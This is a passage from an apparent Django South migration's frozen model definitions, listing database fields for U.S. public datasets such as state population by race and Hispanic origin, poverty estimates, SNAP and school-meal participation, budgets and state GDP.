'native_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'white_alone': ('django.db.models.fields.IntegerField', [], {}),
'white_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_alone_percent': ('django.db.models.fields.FloatField', [], {}),
'white_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationracestate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'PopulationRaceState'},
'asian_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_pacific_islander_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_pacific_islander_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_alone': ('django.db.models.fields.IntegerField', [], {}),
'black_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_alone_percent': ('django.db.models.fields.FloatField', [], {}),
'black_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'multiple_race': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'multiple_race_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'multiple_race_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'multiple_race_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'multiple_race_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'multiple_race_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'white_alone': ('django.db.models.fields.IntegerField', [], {}),
'white_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_alone_percent': ('django.db.models.fields.FloatField', [], {}),
'white_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.presidentsbudget': {
'Meta': {'object_name': 'PresidentsBudget'},
'account_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'account_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'agency_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'bea_category': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'budget_type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'bureau_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'bureau_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'grant_non_grant': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'on_off_budget': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'source_category_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'source_category_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'source_subcategory_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'source_subcategory_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'subfunction_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'subfunction_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'treasury_agency_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'data.presidentsbudgetyear': {
'Meta': {'object_name': 'PresidentsBudgetYear'},
'budget': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'years'", 'to': "orm['data.PresidentsBudget']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '4'})
},
'data.pupilteacherdistrict': {
'Meta': {'object_name': 'PupilTeacherDistrict'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.pupilteacherstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'PupilTeacherState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ratio': ('django.db.models.fields.FloatField', [], {}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.pupilteacherstateraw': {
'Meta': {'object_name': 'PupilTeacherStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ratio': ('django.db.models.fields.FloatField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.race': {
'Meta': {'object_name': 'Race'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'race_abbr': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}),
'race_desc': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'race_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.racecombo': {
'Meta': {'object_name': 'RaceCombo'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'race_combo_flag': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'race_combo_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.retireddisablednilf': {
'Meta': {'object_name': 'RetiredDisabledNilf'},
'disabled_not_in_labor_force': ('django.db.models.fields.IntegerField', [], {}),
'employed_absent': ('django.db.models.fields.IntegerField', [], {}),
'employed_at_work': ('django.db.models.fields.IntegerField', [], {}),
'employed_on_layoff': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'other_not_in_labor_force': ('django.db.models.fields.IntegerField', [], {}),
'retired_not_in_labor_force': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'unemployed_looking': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.saipecountystate': {
'Meta': {'object_name': 'SaipeCountyState'},
'age_0_17_poverty': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_0_17_poverty_90_lower': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_0_17_poverty_90_upper': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_0_17_poverty_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_17_poverty_percent_90_lower': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_17_poverty_percent_90_upper': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_5_poverty': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_0_5_poverty_90_lower': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_0_5_poverty_90_upper': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_0_5_poverty_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_5_poverty_percent_90_lower': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_5_poverty_percent_90_upper': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_5_17_related_poverty': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_5_17_related_poverty_90_lower': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_5_17_related_poverty_90_upper': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_5_17_related_poverty_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_5_17_related_poverty_percent_90_lower': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_5_17_related_poverty_percent_90_upper': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'all_age_poverty': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'all_age_poverty_90_lower': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'all_age_poverty_90_upper': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'all_age_poverty_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'all_age_poverty_percent_90_lower': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'all_age_poverty_percent_90_upper': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'file_tag': ('django.db.models.fields.CharField', [], {'max_length': '22'}),
'fips_county': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'fips_state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'median_household_income': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'median_household_income_90_lower': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'median_household_income_90_upper': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'state_county_name': ('django.db.models.fields.CharField', [], {'max_length': '45'}),
'state_postal_abbreviation': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.saipeschool': {
'Meta': {'object_name': 'SaipeSchool'},
'ccd_district_id': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'district_name': ('django.db.models.fields.CharField', [], {'max_length': '65'}),
'file_stamp': ('django.db.models.fields.CharField', [], {'max_length': '21'}),
'fips_state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'population': ('django.db.models.fields.IntegerField', [], {}),
'relevant_population': ('django.db.models.fields.IntegerField', [], {}),
'relevant_population_poverty': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.schipenrollmentstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SchipEnrollmentState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.schipenrollmentstateraw': {
'Meta': {'object_name': 'SchipEnrollmentStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.schoolbreakfastparticipationstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SchoolBreakfastParticipationState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.schoolbreakfastparticipationstateraw': {
'Meta': {'object_name': 'SchoolBreakfastParticipationStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.schoollunchparticipationstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SchoolLunchParticipationState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.schoollunchparticipationstateraw': {
'Meta': {'object_name': 'SchoolLunchParticipationStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.shelterpopulation': {
'Meta': {'object_name': 'ShelterPopulation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapbenefitsrecipients': {
'Meta': {'object_name': 'SnapBenefitsRecipients'},
'county_fips': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'state_fips': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapmonthlybenefitspersonstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SnapMonthlyBenefitsPersonState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapmonthlybenefitspersonstateraw': {
'Meta': {'object_name': 'SnapMonthlyBenefitsPersonStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapparticipationhouseholdsstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SnapParticipationHouseholdsState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapparticipationhouseholdsstateraw': {
'Meta': {'object_name': 'SnapParticipationHouseholdsStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapparticipationpeoplestate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SnapParticipationPeopleState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapparticipationpeoplestateraw': {
'Meta': {'object_name': 'SnapParticipationPeopleStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.source': {
'Meta': {'object_name': 'Source'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'string_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'data.specialedfunding': {
'Meta': {'object_name': 'SpecialEdFunding'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.state': {
'Meta': {'object_name': 'State'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sort_order': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'state_abbr': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2'}),
'state_ansi': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2'}),
'state_desc': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'state_gnisid': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'state_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.statecompletionrate': {
'Meta': {'object_name': 'StateCompletionRate'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.stategdp': {
'Meta': {'object_name': 'StateGdp'},
'component': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'component_code': ('django.db.models.fields.IntegerField', [], {}),
'fips': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'industry': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'industry_code': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.stategdppre97': {
'Meta': {'object_name': 'StateGdpPre97'},
'component': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'component_code': ('django.db.models.fields.IntegerField', [], {}),
'fips': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'industry': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
